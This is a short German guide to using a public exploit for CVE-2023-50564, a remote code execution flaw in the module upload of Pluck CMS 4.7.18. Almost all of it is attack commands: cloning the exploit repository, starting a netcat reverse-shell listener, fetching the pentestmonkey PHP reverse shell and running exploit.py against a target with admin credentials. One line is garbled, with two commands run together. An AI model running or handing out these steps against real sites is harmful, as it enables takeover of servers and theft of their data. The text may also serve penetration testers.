
Pluck v4.7.18 - Remotecodeausführung (RCE)
Dieser Exploit ermöglicht es einem authentifizierten Admin in Pluck CMS v4.7.18, ein bösartiges ZIP-Modul mit einer PHP-Shell hochzuladen, was zu einer Remote-Codeausführung (RCE) führt.
installmodule-Endpunkt hochgit clone https://github.com/glynzr/CVE-2023-50564.git
cd CVE-2023-50564
pip3 install -r requirements.txt
python3 exploit.py -h
python3 exploit.py -t <target> -u <username> -pass <password> -path <path_to_php_shell> [-p <port>]
Zuerst sollte auf der Angreifermaschine ein Reverse-Shell-Listener gestartet werden (dieser Terminal-Tab sollte nicht geschlossen werden):
nc -nvlp <port angeben>
Dann laden Sie die PHP-Reverse-Shell von https://github.com/pentestmonkey/php-reverse-shell herunter und passen Sie sie an die Angreifermaschine an (IP, Port).
Führen Sie den Exploit-Code in einem anderen Tab aus:
python3 exploit.py -t test.com -u admin -pass samplepassword -path ../php-reverse-shell.php